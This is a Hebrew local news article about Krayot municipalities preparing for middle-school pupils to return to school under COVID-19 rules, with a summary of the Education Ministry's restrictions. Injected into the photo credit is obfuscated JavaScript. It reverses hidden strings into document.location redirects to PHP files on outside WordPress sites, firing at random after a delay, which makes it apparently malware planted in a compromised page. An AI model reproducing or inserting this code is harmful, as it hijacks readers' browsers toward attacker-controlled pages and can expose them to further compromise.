fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

תלמידי חטיבות הביניים חוזרים לבתי הספר, בינתיים

כל הרשויות המקומיות בקריות הודיעו כי הן מוכנות לקליטת תלמידי חטיבות הביניים ביום ראשון הקרוב והוכנו תכניות לטיפול רגשי בתלמידים
מוסדות חינוך בזמן קורונה | צילום: Shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

הרשויות המקומיות בקריות הודיעו כי מערכות החינוך העירוניות מוכנות לחזרה ללימודים וקבלת התלמידים, אם בהוראה פרונטלית ואם בהוראה מרחוק.

מעיריית קרית ביאליק נמסר כי באורט דפנה נערכים בהתרגשות רבה לקראת החזרה לשגרה. בשלב ראשון נערכים לתת מענה מיטבי לצד הרגשי והחברתי של התלמידים. צוות בית הספר עשה מיפוי של המצב הרגשי, החברתי של כל תלמידי בית הספר. נבדקו מעגלי הפגיעות בתחומים אלו וגם נלקח בחשבון הצד הכלכלי שפגע שחלק מהמשפחות. בבית הספר מונתה רכזת פרט, שתפקידה לתכלל את כל נושא הפרט עם החזרה לשגרה. לתלמידים  תתפר חליפה אישית שתכלול את הצד הלימודי והרגשי, לתת תחושה של חזרה הביתה למקום אוהב ועוטף.

במקביל נעשתה היערכות מבחינה פדגוגית להחזיר את התלמידים לפי המתווה לבית הספר. לצמצם פערים לימודיים, הוכנו מערכי שעור  ונבנו תוכניות מותאמות לשם כך. בצד הלוגיסטי נעשו הכנות רחבות הן מבחינת ניקיון הכיתות ודאגה לכל אמצעי ההגיינה.

בחטיבת הביניים אפק מתרגשים לקראת החזרה לבית הספר לאחר למידה ארוכה וקצת אחרת. הלמידה בבית הספר תהיה למידה היברידית, שילוב של למידה מהבית ולמידה מקרוב בתוך בית הספר. בחטיבת הביניים אורט אפק מודעים לקשיים שעמם מתמודדים בני הנוער בתקופת הקורונה והצוות רובו ככולו שם לעצמו למטרה לסייע לתלמידים, להיות קשוב ומכיל ולתת כלים לתלמידים, על מנת להקל ולפתור את הקשיים הריגשיים, החברתיים והלימודיים.

מעיריית קרית מוצקין נמסר כי מערכת החינוך ערוכה להמשך פעילות חטיבות הביניים לכשיתקבל המתווה ומחכים לקבל את התלמידים בזרועות פתוחות. העירייה הודיע כי היא תמתין להוראות המפורשות ולצידן הושלמו ההיערכויות לקפסולות ולשמירה על כללים מחמירים על מנת למנוע ככל האפשר את הפצת הנגיף. במקביל פועלים בימים אלו במספר מישורים בין היתר לעודד מודעות לקבלת חיסונים בקרב הדור הצעיר מגילאי 16+. "לצד המשך שגרת הפעילות נמשיך לתת דגש על עידוד ההתחסנות כחוסן עירוני".

בקרית חיים נמסר מעיריית חיפה כי מערכ החינוך ערוכה ומוכנה לקבלת התלמידים. כל הצוותים הוחזרו לבתי הספר וכל המערכות התפעוליות והממוחשבות הוכנו מבעוד מועד כנדרש על מנת לתת מענה מיטבי לכל מתווה שיקבע על ידי הממשלה. גם עיריית קרית אתא נמסר כי מערכת החינוך העירוניץ ערוכה לקליטת כל תלמידי העיר בהתאם להנחיות.

עיריית קרית ים הודיעה כי היא ערוכה לקליטה מלאה של כל התלמידים בכל שכבות הגילאים. "אנו מקיימים מזה כמה שבועות לימודים בקפסולות בחוץ, בהתאם למתווה משרד החינוך" נמסר מהעירייה "תלמידי החטיבה יצטרפו לתיכונים ולתלמידי הכיתות הנמוכות אשר חזרו לספסל הלימודים. יתר על כן, כל החינוך המיוחד בקריית ים בכל שכבות הגילאים חזר השבוע ללמידה של שישה ימים בשבוע".

על פי הנחיות משרד החינוך, מתווה החזרה ללימודים יפעל כפוף לתכנית שאושרה בקבינט הקורונה, ולצבעי הרמזור שקבע משרד הבריאות. הלימודים ביישובים/אזורים ירוקים, צהובים וכתומים-בהירים, בכיתות ז'/ח'/ט'/י'. הלימוד יתקיים בקבוצות קבועות של עד 20 תלמידים בקבוצה, לפחות יומיים בשבוע. בתי הספר יהיו פתוחים שישה ימים בשבוע. מורה יוכל לעבור בין ארבע קבוצות קבועות, לכל היותר. תלמיד יוכל לעבור בין כיתות כיתות אורגניות/קבוצות.

הלימודים ביישובים/אזורים אדומים וכתומים: כיתות ז'/ח'/ט'/י': ימשיכו למידה מרחוק. פעילות בשטח פתוח תתאפשר בכל היישובים, בקבוצה של 20 משתתפים לכל היותר, כולל אנשי צוות. טיולים חד יומיים בשטח פתוח: ניתן יהיה לקיים טיול חד יומי בשטח פתוח, ללא לינה, בכל היישובים. היציאה לטיול תהיה עם אותן קבוצות קבועות בהן לומדים בשגרה עם אנשי צוות קבועים, בלא תחלופה של אנשי הצוות או של תלמידים בין הקבוצות.

כלל מסגרות החינוך המיוחד בישובים ירוקים, צהובים וביישובים הכתומים המוחרגים, ישובו למתכונת פעילות מלאה, כולל בימי שישי, בהתאם למערכת השעות הרגילה.

בישובים אדומים וכתומים הלמידה תימשך במתכונת הפעילות הנוכחית: לאורך חמישה/שישה ימים בשבוע, לא יאוחר מהשעה 14:00 בצהריים. כמו-כן, תלמידים בשילוב אישי במסגרות החינוך הרגיל ימשיכו ללמוד בהתאם לתכנית האישית המותאמת להם.

לחדשות נוספות בהד הקריות לחצו כאן * לדף הפייסבוק שלנו לחצו כאן*

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות